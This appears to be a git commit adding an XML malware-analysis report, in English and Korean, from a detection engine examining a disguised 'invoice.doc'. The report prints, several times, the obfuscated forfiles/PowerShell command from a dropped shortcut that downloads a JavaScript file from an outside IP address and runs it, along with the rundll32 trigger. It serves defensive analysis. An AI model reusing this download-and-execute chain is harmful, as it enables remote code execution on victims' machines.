first commit

Week1/target.xml

@@ -0,0 +1,194 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<root>
+	<Summary>
+		<Result>Malicious</Result>
+		<DetectName>DOC/DropFileExec.FW.1010</DetectName>
+		<EngineName>profrog</EngineName>
+		<EngineVersion>1.5.0.305</EngineVersion>
+		<Severity>10</Severity>
+		<SampleName>invoice.doc</SampleName>
+		<SampleExt>DOC</SampleExt>
+		<TotalElapsedTime>2.817780</TotalElapsedTime>
+		<ReachedFileLoopLimit>false</ReachedFileLoopLimit>
+		<ReachedUrlLoopLimit>false</ReachedUrlLoopLimit>
+	</Summary>
+	<FileTarget>
+		<invoice.doc_16880>
+			<TargetID>invoice.doc_16880</TargetID>
+			<ParentID></ParentID>
+			<AbsolutePath>d:\Sample\sample_for_QuadMiners\invoice.doc</AbsolutePath>
+			<FileName>invoice.doc</FileName>
+			<FileSize>16880</FileSize>
+			<FileEXT>DOC</FileEXT>
+			<MD5>36B85687634E5B6E4E22CA582D0CC99D</MD5>
+			<SHA1>1B51B1206F2C4B1030A7FCA525454FB4D5BC803E</SHA1>
+			<SHA256>invoice</SHA256>
+			<HAS160>D80336481A8DD017C0B966BC18E74609243A2F05</HAS160>
+			<FileHeaderDump>504B0304140006000800000021007C93BE7C8C010000B5050000130008025B436F6E74656E745F54797065735D2E786D6C20A2040228A000020000000000000000000000000000000000000000000000</FileHeaderDump>
+		</invoice.doc_16880>
+		<skeml.lnk_258>
+			<TargetID>skeml.lnk_258</TargetID>
+			<ParentID>invoice.doc_16880</ParentID>
+			<AbsolutePath>D:/GIT/tripitaka/Build/x64Debug/tripitaka.exe.sandbox/C/Users/Public/skeml.lnk</AbsolutePath>
+			<FileName>skeml.lnk</FileName>
+			<FileSize>258</FileSize>
+			<FileEXT>LNK</FileEXT>
+			<MD5>1205E837D76605911605E2FB589CD98D</MD5>
+			<SHA1>FF41313E2F2A860B0573F5EFA77B9962A88B3D82</SHA1>
+			<SHA256>A07F1A5D03FC4E065DA890134F5794457BDEBF86DF834B21CFFCE63E43491D9D</SHA256>
+			<HAS160>086F7D4F4022A035D30A5DAFB1422C0C178C76BE</HAS160>
+			<FileHeaderDump>EFBBBF5B44454641554C545D0D0A57696E646F775374796C653D370D0A49636F6E4C6F636174696F6E3D0D0A546172676574506174683D664F7266694C65530D0A417267756D656E74733D2F7020633A</FileHeaderDump>
+		</skeml.lnk_258>
+	</FileTarget>
+	<Detection>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>FakeEXT-DOCX</Name>
+			<AnalysisCode></AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>DOCX file has faked as `DOC` format.</Desc>
+			<DescInternational>
+				<ko-KR>DOCX 형식의 파일이 `DOC` 형식인 것처럼 위장했습니다.</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>GetObject</Name>
+			<AnalysisCode>BC</AnalysisCode>
+			<Severity>1</Severity>
+			<Desc>GetObject(&quot;NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8&quot;), RET: WSCRIPT.SHELL</Desc>
+			<DescInternational>
+				<ko-KR>GetObject(&quot;NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8&quot;), RET: WSCRIPT.SHELL</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>CreateShortCut</Name>
+			<AnalysisCode>BC</AnalysisCode>
+			<Severity>2</Severity>
+			<Desc>ARF5XJ(WSCRIPT.SHELL).CreateShortCut(&quot;C:\Users\Public\skeml.lnk&quot;), RET: SHORTCUT</Desc>
+			<DescInternational>
+				<ko-KR>ARF5XJ(WSCRIPT.SHELL).CreateShortCut(&quot;C:\Users\Public\skeml.lnk&quot;), RET: SHORTCUT</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>Save</Name>
+			<AnalysisCode>BC</AnalysisCode>
+			<Severity>1</Severity>
+			<Desc>RECO(SHORTCUT).Save()</Desc>
+			<DescInternational>
+				<ko-KR>RECO(SHORTCUT).Save()</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>FileCreated</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>New file (C:\Users\Public\skeml.lnk) has been created.
+[DEFAULT]
+WindowStyle=7
+IconLocation=
+TargetPath=fOrfiLeS
+Arguments=/p c:\windows\system32 /m notepad.exe /c &quot;cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js&quot;
+WorkingDirectory=
+</Desc>
+			<DescInternational>
+				<ko-KR>새로운 파일 (C:\Users\Public\skeml.lnk)이 생성되었습니다.
+[DEFAULT]
+WindowStyle=7
+IconLocation=
+TargetPath=fOrfiLeS
+Arguments=/p c:\windows\system32 /m notepad.exe /c &quot;cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js&quot;
+WorkingDirectory=
+</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>FileExtracted</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>C:\Users\Public\skeml.lnk</Desc>
+			<DescInternational>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>Exec</Name>
+			<AnalysisCode>BC</AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>ARF5XJ(WSCRIPT.SHELL).Exec(&quot;rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk&quot;)</Desc>
+			<DescInternational>
+				<ko-KR>ARF5XJ(WSCRIPT.SHELL).Exec(&quot;rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk&quot;)</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>DropFileExec</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>10</Severity>
+			<Desc>This is an attack that dropped an hidden file and executes.</Desc>
+			<DescInternational>
+				<ko-KR>감춰둔 파일을 생성해서 실행하는 공격입니다.</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>invoice.doc_16880</TargetID>
+			<Name>RunDll32</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>Attempts to execute a OpenURL() of url.dll. It is used when performing malicious actions with a DLL received from an external source.</Desc>
+			<DescInternational>
+				<ko-KR>url.dll의 OpenURL()를 실행하려고 합니다. 외부에서 받은 DLL로 악성행위를 수행할 때 사용됩니다.</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>skeml.lnk_258</TargetID>
+			<Name>ForFiles</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>3</Severity>
+			<Desc>Attempts to run with forfiles.
+/p c:\windows\system32 /m notepad.exe /c &quot;cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js&quot;</Desc>
+			<DescInternational>
+				<ko-KR>forfiles로 특정 명령을 실행하려고 합니다.
+/p c:\windows\system32 /m notepad.exe /c &quot;cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js&quot;</ko-KR>
+			</DescInternational>
+		</Event>
+		<Event>
+			<EngineName>profrog</EngineName>
+			<EngineVersion>1.5.0.305</EngineVersion>
+			<TargetID>skeml.lnk_258</TargetID>
+			<Name>PowerShell</Name>
+			<AnalysisCode>FW</AnalysisCode>
+			<Severity>8</Severity>
+			<Desc>Attempts to perform malicious commands with PowerShell.
+command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js</Desc>
+			<DescInternational>
+				<ko-KR>PowerShell로 악의적인 명령을 수행하려고 합니다.
+command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js</ko-KR>
+			</DescInternational>
+		</Event>
+	</Detection>
+</root>